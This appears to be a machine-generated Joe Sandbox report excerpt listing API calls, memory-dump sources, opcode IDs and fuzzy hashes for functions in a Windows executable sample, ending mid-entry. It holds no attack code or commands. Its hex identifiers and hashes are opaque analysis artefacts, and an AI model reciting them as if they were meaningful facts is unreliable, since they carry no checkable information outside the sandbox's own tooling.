                                                                          Strings
Similarity
• API ID: _memmove_strncmp
• String ID: >$U$\
• API String ID: 2666721431-237099441
• Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
• Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
• Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
• Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
APIs
• GetKeyboardState.USER32(?), ref: 0044C570
• SetKeyboardState.USER32(00000080), ref: 0044C594
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
• SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
Similarity
• API ID: MessagePost$KeyboardState$InputSend
• String ID:
• API String ID: 2221674350-0
• Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
• Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
• Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
• Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
APIs
Similarity
• API ID: _wcscpy$_wcscat
• String ID:
• API String ID: 2037614760-0
• Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
• Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
• Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
• Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
APIs
• GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
• VariantCopy.OLEAUT32(?,?), ref: 00451BF8
• VariantCopy.OLEAUT32(?,?), ref: 00451C0E
• VariantCopy.OLEAUT32(?,?), ref: 00451C27
• VariantClear.OLEAUT32(?), ref: 00451CA1
• SysAllocString.OLEAUT32(00000000), ref: 00451CBA
Similarity
• API ID: Variant$Copy$AllocClearErrorLastString
• String ID:
• API String ID: 960795272-0
• Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
• Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
• Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
• Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
APIs
• BeginPaint.USER32(00000000,?), ref: 00447BDF
• GetWindowRect.USER32(?,?), ref: 00447C5D
• ScreenToClient.USER32(?,?), ref: 00447C7B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
• EndPaint.USER32(?,?), ref: 00447D13
Similarity
• API ID: Paint$BeginClientRectRectangleScreenViewportWindow
• String ID:
• API String ID: 4189319755-0
• Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
• Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
• Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
• Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
APIs
• SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
• SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
• SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
• InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
• GetWindowLongW.USER32(?,000000F0), ref: 004490D4
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
Similarity
• API ID: MessageSend$LongWindow$InvalidateRect
• String ID:
• API String ID: 1976402638-0
• Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
• Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
• Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
• Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
APIs
• ShowWindow.USER32(?,00000000), ref: 00440A8A
• EnableWindow.USER32(?,00000000), ref: 00440AAF
• ShowWindow.USER32(?,00000000), ref: 00440B18
• ShowWindow.USER32(?,00000004), ref: 00440B2B
• EnableWindow.USER32(?,00000001), ref: 00440B50
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
• Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
• Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
• Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
Strings
Similarity
• API ID: Variant$Copy$ClearErrorLast
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 2487901850-572801152
• Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
• Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
• Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
• Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
APIs
• SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
Similarity
• API ID: Window$Enable$Show$MessageSend
• String ID:
• API String ID: 1871949834-0
• Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
• Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
• Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
• Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                          • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                          • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                          • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                          APIs
                                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                          • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                          • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                          • SendMessageW.USER32 ref: 00471AE3
                                                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                          • String ID:
                                                                          • API String ID: 3611059338-0
                                                                          • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                          • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                          • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                          • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: DestroyWindow$DeleteObject$IconMove
                                                                          • String ID:
                                                                          • API String ID: 1640429340-0
                                                                          • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                          • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                          • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                          • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                          APIs
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • _wcslen.LIBCMT ref: 004438CD
                                                                          • _wcslen.LIBCMT ref: 004438E6
                                                                          • _wcstok.LIBCMT ref: 004438F8
                                                                          • _wcslen.LIBCMT ref: 0044390C
                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                          • _wcstok.LIBCMT ref: 00443931
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 3632110297-0
                                                                          • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                          • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                          • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                          • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                          • String ID:
                                                                          • API String ID: 752480666-0
                                                                          • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                          • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                          • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                          • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                          • String ID:
                                                                          • API String ID: 3275902921-0
                                                                          • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                          • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                          • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                          • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                          • String ID:
                                                                          • API String ID: 3275902921-0
                                                                          • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                          • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                          • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                          • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                          • String ID:
                                                                          • API String ID: 2833360925-0
                                                                          • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                          • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                          • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                          • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                          APIs
                                                                          • SendMessageW.USER32 ref: 004555C7
                                                                          • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                          • String ID:
                                                                          • API String ID: 3691411573-0
                                                                          • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                          • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                          • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                          • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                          APIs
                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                          • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                          • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                          • EndPath.GDI32(?), ref: 004472D6
                                                                          • StrokePath.GDI32(?), ref: 004472E4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                          • String ID:
                                                                          • API String ID: 372113273-0
                                                                          • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                          • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                          • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                          • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 0044CC6D
                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                          Similarity
                                                                          • API ID: CapsDevice$Release
                                                                          • String ID:
                                                                          • API String ID: 1035833867-0
                                                                          • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                          • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                          • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                          • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                          APIs
                                                                          • __getptd.LIBCMT ref: 0041708E
                                                                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                          • __amsg_exit.LIBCMT ref: 004170AE
                                                                          • __lock.LIBCMT ref: 004170BE
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                          • _free.LIBCMT ref: 004170EE
                                                                          • InterlockedIncrement.KERNEL32(009C2CE0), ref: 00417106
                                                                          Similarity
                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                          • String ID:
                                                                          • API String ID: 3470314060-0
                                                                          • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                          • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                          • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                          • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                          • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                            • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                          Similarity
                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                          • String ID:
                                                                          • API String ID: 3495660284-0
                                                                          • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
